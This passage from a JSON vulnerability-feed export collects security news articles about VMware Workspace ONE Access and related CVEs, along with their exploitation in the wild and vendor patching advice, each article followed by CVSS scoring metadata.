**Potential for Attack Chain**\n\nSpecifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.\n\nThe bug affects local domain users and requires that a remote attacker have network access to a vulnerable user interface, according to [a blog post](<https://www.tenable.com/blog/cve-2022-31656-vmware-patches-several-vulnerabilities-in-multiple-products-vmsa-2022-0021>) by Tills published Tuesday. 
Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.\n\nMoreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMware\u2019s release this week\u2014[CVE-2022-31658](<https://www.tenable.com/cve/CVE-2022-31658>) and [CVE-2022-31659](<https://www.tenable.com/cve/CVE-2022-31659>)\u2014to form an attack chain, Tills observed.\n\nCVE-2022-31658 is a JDBC injection RCE vulnerability that affects VMware Workspace ONE Access, Identity Manager and vRealize Automation and that has earned an \u201cimportant\u201d score on the CVSS\u20148.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.\n\nCVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.\n\nThe other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL injection vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.\n\n## **Patch Early, Patch Everything**\n\nVMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.\n\nIn late June, for example, federal agencies warned of [attackers pummeling](<https://threatpost.com/log4shell-targeted-vmware-data/180072/>) VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous 
[Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) RCE vulnerability, an [easy-to-exploit flaw](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) discovered in the Apache logging library Log4J late last year and [continuously targeted](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>) on VMware and other platforms since then.\n\nIndeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.\n\nThis scenario occurred in December 2020, when [the feds warned](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.\n\nThough all signs point to the urgency of patching the latest threat to VMware\u2019s platform, it\u2019s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.\n\nThough enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.\n\n\u201cThe most significant risk for enterprises isn\u2019t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,\u201d Fitzgerald said. 
\u201cThe simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T15:23:16", "type": "threatpost", "title": "VMWare Urges Users to Patch Critical Authentication Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T15:23:16", "id": "THREATPOST:556939F8D58337486DFBC3B2A820DE47", "href": "https://threatpost.com/vmware-patch-critical-bug/180346/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-18T13:56:05", "description": "Recently reported VMware bugs are being used by hackers who are focused on using them to deliver Mirai denial-of-service malware and exploit the [Log4Shell](<https://threatpost.com/log4shell-cve-2021-44228/178225/>) vulnerability.\n\n[Security researchers at Barracuda](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>) discovered that attempts were made to exploit the recent vulnerabilities [CVE-2022-22954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954>) and [CVE-2022-22960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960#:~:text=VMware%20Workspace%20ONE%20Access%2C%20Identity,escalate%20privileges%20to%20'root'.>), both reported last 
month.\n\n\u201cBarracuda researchers analyzed the attacks and payloads detected by Barracuda systems between April and May and found a steady stream of attempts to exploit two recently uncovered VMware vulnerabilities: CVE-2022-22954 and CVE-2022-22960,\u201d Barracuda reported.\n\nVMware published an [advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) on April 6, 2022, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954, with a CVSS score of 9.8; the bug allows an attacker with network access to perform remote code execution via server-side template injection on VMware Workspace ONE Access and Identity Manager solutions.\n\nThe other bug, CVE-2022-22960 (CVSS score 7.8), is a local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to the advisory by VMware, the bug arises due to improper permissions in support scripts, allowing an attacker with local access to gain root privileges.\n\nVMware Workspace ONE is an intelligence-driven workspace platform that helps manage any app on any device in a secure and simpler manner. 
Identity Manager handles authentication to the platform, and vRealize Automation is a DevOps-based infrastructure management platform for configuring IT resources and automating the delivery of container-based applications.\n\n## **Exploitation Occurred After PoC Release**\n\nThe Barracuda researchers noted that these flaws are chained together for a potential full exploitation vector.\n\nAfter the bug was disclosed by VMware in April, a [proof-of-concept (PoC)](<https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433>) was released on GitHub and shared via Twitter.\n\n\u201cBarracuda researchers started seeing probes and exploit attempts for this vulnerability soon after the release of the advisory and the initial release of the proof of concept on GitHub,\u201d reported Barracuda.\n\nAfter the release of the PoC, the researchers noticed a spike in attempts, which they classified as probes rather than actual attempts to exploit.\n\n\u201cThe attacks have been consistent over time, barring a few spikes, and the vast majority of them are what would be classified as probes rather than actual exploit attempts,\u201d they added.\n\nThe researchers at Barracuda also revealed that most of the exploit attempts are primarily from botnet operators; the IPs discovered still seem to host variants of the [Mirai](<https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/>) distributed-denial-of-service (DDoS) botnet malware, along with some Log4Shell exploits and low levels of EnemyBot (a type of DDoS botnet) attempts.\n\nThe majority of the attacks (76 percent) originated from the U.S. geographically, with most of them coming from data centers and cloud providers. 
The researchers added that there was a spike in IP addresses from the UK and Russia, and about 6 percent of the attacks emanated from these locations.\n\nThe researchers noted, \u201cthere are also consistent background attempts from known bad IPs in Russia.\u201d\n\n\u201cSome of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes,\u201d researchers explained.\n\nAccording to Barracuda, \u201cthe interest levels on these vulnerabilities have stabilized\u201d after the initial spike in April, and the researchers expected to analyze low-level scanning and attempts for some time.\n\nThe best way to protect systems is to apply the patches immediately, especially if the system is internet-facing; placing a web application firewall (WAF) in front of such systems \u201cwill add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell,\u201d Barracuda advised.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-18T13:54:23", "type": "threatpost", "title": "April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-05-18T13:54:23", "id": "THREATPOST:590E1D474E265F02BA634F492F728536", "href": "https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhvc4vGa2IyZoEewlN5F2HLawFs-FiMfHbW4QfyADIIlt1iZUhIxuVnmgW6OYvwtnA8RRwFKws709zm8x4QGA3Gjc61Xg_tf94C7Z17P13EC8cbOs76bcIf9a5b7SMFV8G7sd8QGfCevWnV_Q9Kg2-lbEV_iKtrOBXnxT2bvyaoQSZsfA8u0fYqJ3e/s728-e100/vmware.jpg>)\n\nA week after VMware released patches to remediate eight security vulnerabilities in VMware Workspace ONE Access, threat actors have begun to actively exploit one of the critical flaws in the wild.\n\nTracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>), the security shortcoming relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager. The bug is rated 9.8 in severity.\n\n\"A malicious actor with network access can trigger a server-side [template injection](<https://attack.mitre.org/techniques/T1221/>) that may result in remote code execution,\" the company [noted](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) in its advisory.\n\nThe virtualization services provider has since revised its bulletin to warn customers of confirmed exploitation of CVE-2022-22954 occurring in the wild. 
Cybersecurity firm Bad Packets also [corroborated](<https://twitter.com/bad_packets/status/1514293472697585669>) that it detected attempts to weaponize the vulnerability.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBkLA9DuiHdpMKAdtIDMXGOSM4ENpxHRWfjsY6YoTBu_2LF_XjrUfbbJ-nYkR8AFIAG8Zazz7eJNKh9X1YP1SCtSa47PJ6yk56jDkN45SwnryIhQxD4kzIcKtkkm98pnuhnXdGOsJh5yD7DrWg8xAbbui46r8dbWBrPqVVjcCI4CyPBgStwOIpdwb-1w/s728-e100/code.jpg>) \n--- \n_Source: [Bad Packets](<https://twitter.com/bad_packets/status/1514293472697585669>)_ \n \nIt's worth noting that the patches shipped last week address seven more vulnerabilities in VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager, four of which are rated Critical, two are rated Important, and one is rated Moderate.\n\nIn light of recurring exploitation of VMWare products by nation-state groups and cyber criminal actors, it's recommended that users move quickly to upgrade to the latest version.\n\n\"This critical vulnerability should be patched or mitigated immediately,\" VMware cautioned last week. \"The ramifications of this vulnerability are serious.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T04:31:00", "type": "thn", "title": "Critical VMware Workspace ONE Access Flaw Under Active Exploitation in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-15T03:14:50", "id": "THN:64D0BEEE72A10FD1445F5CDC2BC902CD", "href": "https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj47_HIWfPxH5nbpGcyEGnt-ZPZUblMOdI_XpyXhu1zRF1eYsvMu6GSc6bhTgUCrOaV7L25EjaOR8knwftP2qbqWLuhSYH3bGjzZDAkqyGt6fVZ1W-qfB01o-OHDuHl6PxzYy5egsmKEPRd_76LyJQI61EFr5fbv02-zMWMSxQIWlRXXlm66FG1JuJG/s728-e100/vmware.jpg>)\n\nAn Iranian-linked threat actor known as [Rocket 
Kitten](<https://malpedia.caad.fkie.fraunhofer.de/actor/rocket_kitten>) has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems.\n\nTracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager.\n\nWhile the issue was patched by the virtualization services provider on April 6, 2022, the company [cautioned users](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) of confirmed exploitation of the flaw occurring in the wild a week later.\n\n\"A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface,\" researchers from Morphisec Labs [said](<https://blog.morphisec.com/vmware-identity-manager-attack-backdoor>) in a new report. 
\"This means highest privileged access into any components of the virtualized host and guest environment.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhtoAdHVO82LyDd1ISfF5Brv_F82zXW-gIB-NNtLXut6vg0kWkbjo2C5l1U80DnQ5nbU08CZK0RXCATcUVqR9hCI7rUoe6ooD82T1GnoZUwE_PkujXdgqaUEUxOtL5yj9rP3VYWGwRknAndD2hdvd5CGmIj5kPUzuWG-9Km85z3pkHQVZTGpIstcHs-/s728-e100/code.jpg>)\n\nAttack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is then used to download a next-stage payload called PowerTrash Loader that, in turn, injects the penetration testing tool, Core Impact, into memory for follow-on activities.\n\n\"The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries,\" the researchers said.\n\n\"VMWare customers should also review their VMware architecture to ensure the affected components are not accidentally published on the internet, which dramatically increases the exploitation risks.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T06:18:00", "type": "thn", "title": "Iranian Hackers Exploiting VMware RCE Bug to Deploy 'Core Impact' Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-26T08:11:21", "id": "THN:36E70A976BC3FFE43255D807083BFC54", "href": "https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhYhLQpXs4ktmT4ASmNAm5WMPRLKn4KvCxGQyM7EUAt14UC4QzviyfBgNuoSlz7Io5LkrYc0OlVgrHUNLomiCaU4D0tsiE_2gHLUGxLoqlqr4QP2EV4WeXDF5CpRNAym0ZE5qE7zSyielAkBR_SPDfb2Y0thtvBSEkDXPGj41Yw6TbLPuIR_EMnfFoy/s728-e100/vmware.jpg>)\n\nCloud computing and virtualization technology firm VMWare on Thursday rolled out 
an update to resolve a critical security flaw in its Cloud Director product that could be weaponized to launch remote code execution attacks.\n\nThe issue, assigned the identifier **CVE-2022-22966**, has a CVSS score of 9.1 out of a maximum of 10. VMware credited security researcher Jari J\u00e4\u00e4skel\u00e4 with reporting the flaw.\n\n\"An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2022-0013.html>) in an advisory.\n\nVMware Cloud Director, formerly known as vCloud Director, is used by many well-known cloud providers to operate and manage their cloud infrastructures and gain visibility into datacenters across sites and geographies.\n\nThe vulnerability could, in other words, end up allowing attackers to gain access to sensitive data and take over private clouds within an entire infrastructure.\n\nAffected versions include 10.1.x, 10.2.x, and 10.3.x, with fixes available in versions 10.1.4.1, 10.2.2.3, and 10.3.3. 
The company has also published [workarounds](<https://kb.vmware.com/s/article/88176>) that can be followed when upgrading to a recommended version is not an option.\n\nThe patches arrive a day after [exploits](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) for another recently fixed critical flaw in VMware Workspace ONE Access were detected in the wild.\n\nThe flaw ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>)) relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager.\n\nWith VMware products often becoming a lucrative target for threat actors, the update adds to the urgency for organizations to apply necessary mitigations to prevent potential threats.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T03:42:00", "type": "thn", "title": "Critical VMware Cloud Director Bug Could Let Hackers Takeover Entire Cloud Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22966"], "modified": "2022-04-15T05:06:07", "id": "THN:7B73599687A27ACB89413C3B769DDF1A", "href": "https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T07:57:31", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjSO96Yr-42fbrwo8Mz26dzReMLZBhBr-1y2b_cB3rt2ldR4iIM7XFpqSzVBRcP_q35yY85Ysv9PamOsQtEGalqVo2kEVwH_UJHgY50OISBQnM-3HRZhjpqha3plzcVxRynX38KP35JKE3M_erCFmCzEHH5doe8_AoevSX3BHQ1zu4iRmKbkVcli0En/s728-e100/log4shell.gif>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.\n\n\"Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>). 
\"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).\"\n\nIn one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.\n\n[Log4Shell](<https://thehackernews.com/2022/05/hackers-exploiting-vmware-horizon-to.html>), tracked as [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that's used by a wide range of consumers and enterprise services, websites, applications, and other products.\n\nSuccessful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.\n\nBased on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed \"hmsvc.exe\" that's equipped with capabilities to log keystrokes and deploy additional malware.\n\n\"The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,\" the agencies noted, adding it also offers a \"graphical user interface (GUI) access over a target Windows system's desktop.\"\n\nThe PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.\n\nFurthermore, the adversarial collective leveraged 
[CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>), a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.\n\nOngoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.\n\nAccording to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.\n\n\"Log4j is here to stay, we will see attackers leveraging it again and again,\" IBM-owned Randori [said](<https://www.randori.com/blog/log4j-top-targets-report/>) in an April 2022 report. \"Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we'll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-24T03:36:00", "type": "thn", "title": "Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954"], "modified": "2022-06-24T07:37:32", "id": "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "href": "https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-22T06:05:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJ3SC2qFmfiT2jBQ7uRL9vKJi04DUQpsbO7A1fNUs1i-nZPcOSHqMLLfs_NxeIWgJPJ2McE-e40OOFqvdqKfS0qk_q6XqVy_xUhkwizccN3QgiI-H1dOdGFgFFwwvYHrxwya9G6TK7xOMoBeRuvZfW3Geg0Pc1jMEivILjONU_jtyyRjiHc5KUXehz/s728-e100/grep.jpg>)\n\nA now-patched vulnerability in VMware Workspace ONE 
Access has been observed being exploited to deliver both cryptocurrency miners and ransomware on affected machines.\n\n\"The attacker intends to utilize a victim's resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability>) in a Thursday report.\n\nThe issue, tracked as [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) (CVSS score: 9.8), concerns a remote code execution vulnerability that stems from a case of server-side template injection. Although the shortcoming was addressed by the virtualization services provider in April 2022, it has since [come under](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) [active](<https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html>) [exploitation](<https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html>) in the wild.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgCzQo1tIhYRt-mkTxp41FcBePtsfRo_0tt2H20xagyE-yzpJQWfvPovyzF8oAp3ngrJfVIoxp1VzJtUcqI6SvAVfj4g7-ADrm6lygex9p_UWMiWbLjRDVWkeWIYcKP1YVnpxBpM6MI7x9NHMr0WpP-N98EjFBZZzRqUPLyn9l0BckAKjxGBtuyAIkt/s728-e100/cyberattacks.jpg>)\n\nFortinet said it observed in August 2022 attacks that sought to weaponize the flaw to deploy the [Mirai botnet](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) on Linux devices as well as the RAR1Ransom and [GuardMiner](<https://www.fortinet.com/fortiguard/threat-and-incident-notifications>), a variant of the XMRig Monero miner.\n\nThe Mirai sample is retrieved from a remote server and is designed to launch denial-of-service (DoS) and brute-force attacks aimed at well-known IoT devices by making use of a list of default credentials.\n\nThe distribution of 
RAR1Ransom and GuardMiner, on the other hand, is achieved by means of a PowerShell or a shell script depending on the operating system. RAR1ransom is also notable for leveraging the legitimate WinRAR utility to lock files in password-protected archives.\n\nFurthermore, GuardMiner comes with capabilities to propagate to other hosts by taking advantage of exploits for a number of remote code execution flaws in other software, including those in [Apache Struts](<https://nvd.nist.gov/vuln/detail/CVE-2021-31805>), [Atlassian Confluence](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>), and [Spring Cloud Gateway](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>).\n\nThe findings are yet another reminder that malware campaigns continue to actively exploit recently disclosed flaws to break into unpatched systems, making it essential that users prioritize applying necessary security updates to mitigate such threats.\n\n \n\n\nFound this article interesting? 
